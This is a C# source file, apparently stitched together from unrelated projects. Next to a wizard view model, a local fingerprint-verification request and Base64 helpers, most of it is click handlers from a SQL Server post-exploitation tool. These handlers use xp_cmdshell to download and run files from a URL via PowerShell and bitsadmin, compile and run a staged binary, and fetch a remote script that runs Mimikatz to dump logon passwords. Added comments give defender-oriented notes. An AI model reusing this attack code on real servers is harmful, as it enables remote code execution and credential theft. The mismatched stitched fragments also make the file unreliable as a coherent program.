/// <summary>
/// Builds the wizard view model: sets the initial button and progress flags,
/// creates the helper services, copies the session token and user from the
/// <c>MainViewModel</c> singleton, and loads the slides.
/// </summary>
public WizardViewModel()
{
    // Navigation buttons: the wizard opens on its first slide.
    PrevEnabled = false;
    NextEnabled = true;
    CloseEnabled = true;
    CheckEnabled = false;
    SkipEnabled = true;
    Loading = false;

    // Helper services owned by this view model.
    Permiso = new PermissionValidator();
    Api = new ApiService();
    Codificator = new EncodeBase64();

    IsAnalyzing = false;
    IsScanning = false;

    // The token and user are taken from the application-wide singleton, so this
    // instance holds its own reference to the session credential.
    var main = MainViewModel.GetInstance();
    token = main.Token;
    user = main.User;

    PositionWizard = 0;
    LoadSlides();
}
/// <summary>
/// Click handler for the "download" action of a SQL Server post-exploitation UI.
/// It checks xp_cmdshell availability for the selected server, then builds a
/// PowerShell <c>WebClient.DownloadFile</c> command from the URL and save-location
/// text boxes, wraps it in <c>EXEC xp_cmdshell</c>, and passes it to <c>RevConn</c>.
/// </summary>
/// <remarks>
/// Defender view: on the database host this appears as the SQL Server service
/// spawning a command shell via xp_cmdshell, followed by an outbound download.
/// Keeping xp_cmdshell disabled, alerting on changes to that setting, running the
/// service under a low-privilege account and restricting its egress all blunt this path.
/// </remarks>
private void btnDownload_Click(object sender, RoutedEventArgs e)
{
    // Local copies of the cmdControl flags; the assignments below change only
    // these locals, not cmdControl itself.
    var isActivated = cmdControl.isActivated;
    var isExecuted = cmdControl.isExecuted;
    if (isActivated == false && isExecuted == false)
    {
        // NOTE(review): SelectedItem is dereferenced outside any try block; with
        // no selection this presumably throws before the handler does anything.
        var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
        try
        {
            Dispatcher.Invoke((Action) delegate
            {
                // XpCmdShellStatus is defined elsewhere; judging by its name it
                // checks or enables xp_cmdshell on the target - confirm.
                enableXpCmdShell.XpCmdShellStatus();
                txtStatus.AppendText(enableXpCmdShell.Result);
                // Success is detected by substring match against a localized UI
                // string, so the outcome depends on the selected language resource.
                var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
                var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
                if (contains == true)
                {
                    isActivated = true;
                    isExecuted = true;
                }
            });
        }
        catch (Exception)
        {
            // The exception object is discarded; only the helper's own
            // CmdException text is shown.
            Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
            {
                txtStatus.AppendText(enableXpCmdShell.CmdException);
            });
        }
    }
    if (isExecuted == true && isActivated == true)
    {
        Dispatcher.Invoke((Action) delegate
        {
            // Both text-box values are concatenated into the command unescaped.
            var clearText = "(new-object System.Net.WebClient).DownloadFile('" + txtUrl.Text + "', '" + txtSaveLocation.Text + "')";
            // ConvertTextToBase64NonBypass is not shown here; presumably it returns
            // an encoded PowerShell command line. Encoded PowerShell launched from
            // the SQL Server process is a strong detection signal.
            clearText = EncodeBase64.ConvertTextToBase64NonBypass(clearText);
            var _execCode = string.Empty;
            _execCode += "EXEC xp_cmdshell '" + clearText + "'";
            txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}");
            RevConn(_execCode);
        });
    }
}
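/// <summary>
/// Posts the key and the Base64-encoded template and query images to the local
/// PrintVerification endpoint as a form-encoded body and returns the raw response text.
/// </summary>
/// <returns>The response body as returned by the service.</returns>
/// <remarks>
/// Every name and value is URL-encoded before it is joined into the body. Base64
/// output contains '+', '/' and '=', and the key comes from a text box, so an
/// unencoded body can be corrupted by the server's form decoder ('+' is read as a
/// space) and a key containing '&amp;' or '=' could inject extra form fields.
/// The endpoint is plain HTTP on loopback; if it ever moves off the local machine
/// the key would travel in clear text and the URL should become HTTPS.
/// </remarks>
private string ComputeVerification()
{
    var key = tboxKey.Text;
    var templateEncoded = EncodeBase64.ImageToBase64(template.FileBytes);
    var queryEncoded = EncodeBase64.ImageToBase64(query.FileBytes);

    // Alternating name/value list, turned into name=value pairs below.
    var fields = new[] { "key", key, "template", templateEncoded, "query", queryEncoded };
    var pairs = new string[fields.Length / 2];
    for (int i = 0; i + 1 < fields.Length; i += 2)
    {
        pairs[i / 2] = WebUtility.UrlEncode(fields[i]) + "=" + WebUtility.UrlEncode(fields[i + 1]);
    }

    // After URL-encoding the body is pure ASCII, so this encoding loses nothing.
    byte[] buffer = Encoding.ASCII.GetBytes(string.Join("&", pairs));

    HttpWebRequest request = (HttpWebRequest)WebRequest.Create("http://localhost:53210/api/PrintVerification/");
    request.Proxy = WebRequest.DefaultWebProxy;
    request.Method = "POST";
    request.ContentType = "application/x-www-form-urlencoded";
    request.ContentLength = buffer.Length;

    // Close the request stream before asking for the response, and dispose every
    // stream even when the service call throws.
    using (Stream requestStream = request.GetRequestStream())
    {
        requestStream.Write(buffer, 0, buffer.Length);
    }

    using (WebResponse response = request.GetResponse())
    using (Stream responseStream = response.GetResponseStream())
    using (StreamReader reader = new StreamReader(responseStream))
    {
        return reader.ReadToEnd();
    }
}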
/// <summary>
/// Runs the supplied T-SQL batch against the server selected in <c>lstLooted</c>
/// through <c>_postExploitation</c>, reports the outcome in <c>txtStatus</c>, and,
/// if the result text contains "be resolved", retries the download with an
/// <c>Invoke-WebRequest</c> command built from the URL and save-location boxes.
/// </summary>
/// <param name="execCode">T-SQL text assigned to <c>_postExploitation.ExploitCode</c>.</param>
/// <remarks>
/// Defender view: both attempts reach the target as <c>EXEC xp_cmdshell</c> with a
/// PowerShell download command, so SQL Server spawning a shell and then making an
/// outbound web request is the behaviour to alert on. All exceptions are caught
/// and shown as text; nothing is rethrown.
/// </remarks>
private void RevConn(string execCode)
{
    try
    {
        // Nothing is sent unless a server is selected.
        if (lstLooted.SelectedIndex != -1)
        {
            try
            {
                var isError = false;
                Dispatcher.Invoke((Action) delegate
                {
                    _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                    _postExploitation.ExploitCode = execCode;
                    _postExploitation.RunExploit();
                    var result = _postExploitation.ExploitResult;
                    // Outcome is inferred from substrings of the returned text;
                    // "be resolved" presumably matches a name-resolution error - confirm.
                    isError = result.Contains("be resolved");
                    if (result == "\r\n")
                    {
                        txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("ExploitClearLog2"));
                    }
                    else if (isError == true)
                    {
                        txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload6"));
                    }
                    else if (isError == false)
                    {
                        var result2 = result.Contains("Completed");
                        if (result2 == true)
                        {
                            txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload8") + txtSaveLocation.Text);
                        }
                    }
                    if (isError == true)
                    {
                        // Second attempt: same download expressed with a different
                        // PowerShell cmdlet, again built by unescaped concatenation.
                        txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload7"));
                        _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                        txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}");
                        var expCode = EncodeBase64.ConvertTextToBase64NonBypass("Invoke-WebRequest \"" + txtUrl.Text + "\" -OutFile \"" + txtSaveLocation.Text + "\"");
                        _postExploitation.ExploitCode = "EXEC xp_cmdshell '" + expCode + "'";
                        _postExploitation.RunExploit();
                        var resultz = _postExploitation.ExploitResult;
                        isError = false; // redundant: overwritten on the next line
                        isError = resultz.Contains("be resolved");
                        if (resultz == "\r\n")
                        {
                            txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("ExploitClearLog2"));
                        }
                        else if (isError == true)
                        {
                            txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload6"));
                        }
                        else if (isError == false)
                        {
                            // NOTE(review): this non-error branch reuses the
                            // "MessageDownload6" key that the error branch shows.
                            txtStatus.AppendText(Environment.NewLine + _languageControl.SelectedLanguage.GetString("MessageDownload6") + txtSaveLocation.Text);
                        }
                    }
                });
            }
            catch (Exception exp)
            {
                Dispatcher.Invoke((Action) delegate
                {
                    // Format order: GeneralError1, GeneralError2, newline, exception message.
                    txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                });
            }
        }
        else
        {
            Dispatcher.Invoke((Action) delegate
            {
                txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageExploitError1")}");
            });
        }
    }
    catch (Exception exp)
    {
        Dispatcher.Invoke((Action) delegate
        {
            txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
        });
    }
}
/// <summary>
/// Click handler for "download and execute". After the xp_cmdshell check it either
/// (BITS option) starts the BITS service, transfers the file with bitsadmin and runs
/// the saved path, or (otherwise) downloads with a PowerShell WebClient command and
/// then runs the saved path. Each step is sent through a two-argument <c>RevConn</c>
/// overload that is not part of this listing.
/// </summary>
/// <remarks>
/// Defender view: the BITS branch leaves a transfer job named "WarSQLiJob" and a
/// "net start BITS" issued from the SQL Server process; both branches end with the
/// downloaded file being executed through xp_cmdshell. BITS job creation by a
/// database service account and child processes of the SQL Server service are the
/// signals to monitor; keeping xp_cmdshell disabled removes the execution primitive.
/// </remarks>
private void btnDownloadExecute_Click(object sender, RoutedEventArgs e)
{
    // Local copies of the cmdControl flags; only these locals are updated below.
    var isActivated = cmdControl.isActivated;
    var isExecuted = cmdControl.isExecuted;
    if (isActivated == false && isExecuted == false)
    {
        // NOTE(review): SelectedItem is dereferenced outside any try block.
        var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
        try
        {
            Dispatcher.Invoke((Action) delegate
            {
                // Defined elsewhere; presumably checks or enables xp_cmdshell - confirm.
                enableXpCmdShell.XpCmdShellStatus();
                txtStatus.AppendText(enableXpCmdShell.Result);
                // Success is a substring match against a localized resource string.
                var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
                var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
                if (contains == true)
                {
                    isActivated = true;
                    isExecuted = true;
                }
            });
        }
        catch (Exception)
        {
            Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
            {
                txtStatus.AppendText(enableXpCmdShell.CmdException);
            });
        }
    }
    if (isExecuted == true && isActivated == true)
    {
        if (rdBits.IsChecked == true)
        {
            try
            {
                if (!string.IsNullOrEmpty(txtUrl.Text) && !string.IsNullOrEmpty(txtSaveLocation.Text))
                {
                    var _execCode = string.Empty;
                    // The delegate is queued with BeginInvoke, so an exception
                    // raised inside it does not reach the surrounding catch.
                    Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                    {
                        // _execCode is appended to and never cleared in this branch,
                        // so each later RevConn call carries the earlier statements too.
                        _execCode += "USE [master]\r\n";
                        _execCode += "EXEC xp_cmdshell '\"net start BITS\"';\r\n";
                        txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload1")}");
                        RevConn(_execCode, 0);
                        _execCode += "USE [master]\r\n";
                        // URL and destination are concatenated unescaped.
                        _execCode += "EXEC xp_cmdshell '\"bitsadmin /transfer WarSQLiJob /download /priority normal " + txtUrl.Text + " " + txtSaveLocation.Text + "\"';\r\n";
                        txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload2")}");
                        RevConn(_execCode, 0);
                        _execCode += "USE [master]\r\n";
                        // Final step executes whatever was saved at the destination path.
                        _execCode += "EXEC xp_cmdshell '\"" + txtSaveLocation.Text + "\"';\r\n";
                        txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload3")}");
                        RevConn(_execCode, 0);
                    });
                }
            }
            catch (Exception exp)
            {
                Dispatcher.Invoke((Action) delegate
                {
                    txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                });
            }
        }
        else
        {
            Dispatcher.Invoke((Action) delegate
            {
                var clearText = "(new-object System.Net.WebClient).DownloadFile('" + txtUrl.Text + "', '" + txtSaveLocation.Text + "')";
                // ConvertTextToBase64 is defined elsewhere; presumably yields an
                // encoded PowerShell command line - confirm.
                clearText = EncodeBase64.ConvertTextToBase64(clearText);
                var _execCode = string.Empty;
                _execCode += "EXEC xp_cmdshell '" + clearText + "'";
                txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload5")}");
                RevConn(_execCode, 1);
                // Unlike the BITS branch, the batch is reset before the execute step.
                _execCode = string.Empty;
                _execCode += "EXEC xp_cmdshell '" + txtSaveLocation.Text + "'\r\n";
                txtStatus.AppendText($"{Environment.NewLine}{_languageControl.SelectedLanguage.GetString("MessageDownload3")}");
                RevConn(_execCode, 0);
            });
        }
    }
}
/// <summary>
/// Click handler that converts the clear-text box content with
/// <c>EncodeBase64.ConvertTextToBase64</c> and shows the result in the Base64 box.
/// </summary>
private void BtnConvert_OnClick(object sender, RoutedEventArgs e)
{
    var clearText = txtClearText.Text;
    txtBase64.Text = EncodeBase64.ConvertTextToBase64(clearText);
}
/// <summary>
/// Click handler that delivers and runs a credential-dumping payload on the selected
/// SQL Server. With the "local" option it stages a local file through a temporary
/// table, exports it with bcp, compiles it with csc.exe and runs the result; otherwise
/// it sends a PowerShell command that downloads a script from the URL box and calls
/// <c>Invoke-Mimikatz</c>. Every step reaches the server as <c>EXEC xp_cmdshell</c>.
/// </summary>
/// <remarks>
/// Defender view: the artefacts visible in this code are a table named WarSQLiTemp,
/// bcp.exe "queryout" writing a 12-character .txt file under C:\Users\MSSQLSERVER\,
/// csc.exe from Framework64\v4.0.30319 producing eyup.exe in the same folder, and
/// cmd.exe launching it - all as children of the SQL Server service. The remote
/// branch requests sekurlsa::logonPasswords, i.e. LSASS credential material.
/// Disabling xp_cmdshell, application control for compilers under service accounts,
/// LSASS protection and process-lineage alerting address each stage.
/// The steps are queued with Dispatcher.BeginInvoke and share state through captured
/// locals and <c>_postExploitation</c>, so their behaviour depends on queue order.
/// </remarks>
private void btnRun_Click(object sender, RoutedEventArgs e)
{
    // Local copies of the cmdControl flags; only these locals are updated below.
    var isActivated = cmdControl.isActivated;
    var isExecuted = cmdControl.isExecuted;
    if (isActivated == false && isExecuted == false)
    {
        // NOTE(review): SelectedItem is dereferenced outside any try block.
        var enableXpCmdShell = new EnableXpCmdShell { LootedServer = lstLooted.SelectedItem.ToString() };
        try
        {
            Dispatcher.Invoke((Action) delegate
            {
                // Defined elsewhere; presumably checks or enables xp_cmdshell - confirm.
                enableXpCmdShell.XpCmdShellStatus();
                txtStatus.AppendText(enableXpCmdShell.Result);
                // Success is a substring match against a localized resource string.
                var cmdLandResult = _languageControl.SelectedLanguage.GetString("XPCmdShell2");
                var contains = enableXpCmdShell.Result.Contains(cmdLandResult);
                if (contains == true)
                {
                    isActivated = true;
                    isExecuted = true;
                }
            });
        }
        catch (Exception)
        {
            Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
            {
                txtStatus.AppendText(enableXpCmdShell.CmdException);
            });
        }
    }
    if (isExecuted == true && isActivated == true)
    {
        if (rdLocal.IsChecked == true)
        {
            var savedFileNAme = string.Empty;
            // Read from a path relative to the working directory, outside any try block.
            var mimiBinary = File.ReadAllBytes(@"Scanner\Mimikatz\1.txt");
            try
            {
                // Stage 1: create the temporary table and insert the file bytes.
                // The work is queued, so exceptions thrown inside the delegate are
                // not seen by the catch below.
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                    _postExploitation.CreateBinaryTable();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                    _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                    _postExploitation.BinaryData = mimiBinary;
                    _postExploitation.InsertBinaryData();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                });
            }
            catch (Exception exp)
            {
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                });
            }
            try
            {
                // Stage 2: export the table content to a file on the server with bcp.
                _postExploitation.ExploitCode = string.Empty;
                // Non-cryptographic generator; the name is only a 12-character label.
                var rnd = new Random();
                var chr = "0123456789ABCDEFGHIJKLMNOPRSTUVWXYZ".ToCharArray();
                var randomFileName = string.Empty;
                for (int i = 0; i < 12; i++)
                {
                    // Random.Next's upper bound is exclusive, so the last character
                    // of the alphabet is never chosen.
                    randomFileName += chr[rnd.Next(0, chr.Length - 1)].ToString();
                }
                var extension = "txt";
                _postExploitation.ExploitCode += "DECLARE @cmd VARCHAR(8000);";
                _postExploitation.ExploitCode += "SET @cmd = 'bcp.exe \"SELECT CAST(binaryTable AS VARCHAR(MAX)) FROM WarSQLiTemp\" queryout \"C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension + "\" -c -T';";
                _postExploitation.ExploitCode += "EXEC xp_cmdshell @cmd;";
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                    _postExploitation.RunExploit();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                    txtStatus.AppendText("File Saved: C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension);
                    // Set inside a queued delegate and read by a later queued one.
                    savedFileNAme = "C:\\Users\\MSSQLSERVER\\" + randomFileName + "." + extension;
                });
            }
            catch (Exception exp)
            {
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                });
            }
            try
            {
                // Stage 3: drop the temporary table.
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                    _postExploitation.RemoveTempTable();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                });
            }
            catch (Exception exp)
            {
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                });
            }
            try
            {
                // Stage 4: compile the exported file on the server with the
                // framework's csc.exe, then run the produced executable.
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    _postExploitation.ExploitCode = string.Empty;
                    _postExploitation.ExploitCode += "EXEC xp_cmdshell 'C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /out:C:\\Users\\MSSQLSERVER\\eyup.exe " + savedFileNAme + "';";
                    _postExploitation.RunExploit();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                });
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    _postExploitation.ExploitCode = string.Empty;
                    _postExploitation.ExploitCode += "EXEC xp_cmdshell 'cmd.exe /c C:\\Users\\MSSQLSERVER\\eyup.exe';";
                    _postExploitation.RunExploit();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                });
            }
            catch (Exception exp)
            {
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                });
            }
        }
        else
        {
            try
            {
                // Remote branch: nothing is staged in the database; the server is
                // told to fetch a script from the URL box and run it in memory.
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    _postExploitation.SelectedItem = lstLooted.SelectedItem.ToString();
                    var sendMimiText = "IEX (New-Object Net.WebClient).DownloadString('" + txtUrl.Text + "'); Invoke-Mimikatz -Command \"privilege::debug sekurlsa::logonPasswords exit\"";
                    // ConvertTextToBase64 is defined elsewhere; presumably yields an
                    // encoded PowerShell command line - confirm.
                    var psBs64 = EncodeBase64.ConvertTextToBase64(sendMimiText);
                    _postExploitation.ExploitCode = string.Empty;
                    _postExploitation.ExploitCode += "EXEC xp_cmdshell '" + psBs64 + "';";
                    _postExploitation.RunExploit();
                    txtStatus.AppendText(_postExploitation.ExploitResult);
                });
            }
            catch (Exception exp)
            {
                Dispatcher.BeginInvoke(DispatcherPriority.Send, (Action) delegate
                {
                    txtStatus.AppendText(string.Format("{2}{3}{0}{1}", Environment.NewLine, exp.Message, _languageControl.SelectedLanguage.GetString("GeneralError1"), _languageControl.SelectedLanguage.GetString("GeneralError2")));
                });
            }
        }
    }
}
/// <summary>
/// Decodes a stored message for display by passing it to
/// <c>EncodeBase64.Decode</c> on a fresh instance.
/// </summary>
/// <param name="msg">The stored (encoded) text.</param>
/// <returns>Whatever <c>Decode</c> returns for <paramref name="msg"/>.</returns>
/// <remarks>
/// Decoding only reverses the transform; the result is not made safe for display
/// here, so any output escaping has to happen where the value is rendered.
/// </remarks>
public static string ToView(string msg)
{
    return new EncodeBase64().Decode(msg);
}
/// <summary>
/// Encodes a message for storage by passing it to
/// <c>EncodeBase64.Encode</c> on a fresh instance.
/// </summary>
/// <param name="msg">The text to store.</param>
/// <returns>Whatever <c>Encode</c> returns for <paramref name="msg"/>.</returns>
/// <remarks>
/// Judging by the class name this is presumably Base64, which is a reversible
/// encoding and not encryption: it gives stored data no confidentiality, and it
/// does not replace parameterized queries when the value is written to the database.
/// </remarks>
public static string ToDatabase(string msg)
{
    return new EncodeBase64().Encode(msg);
}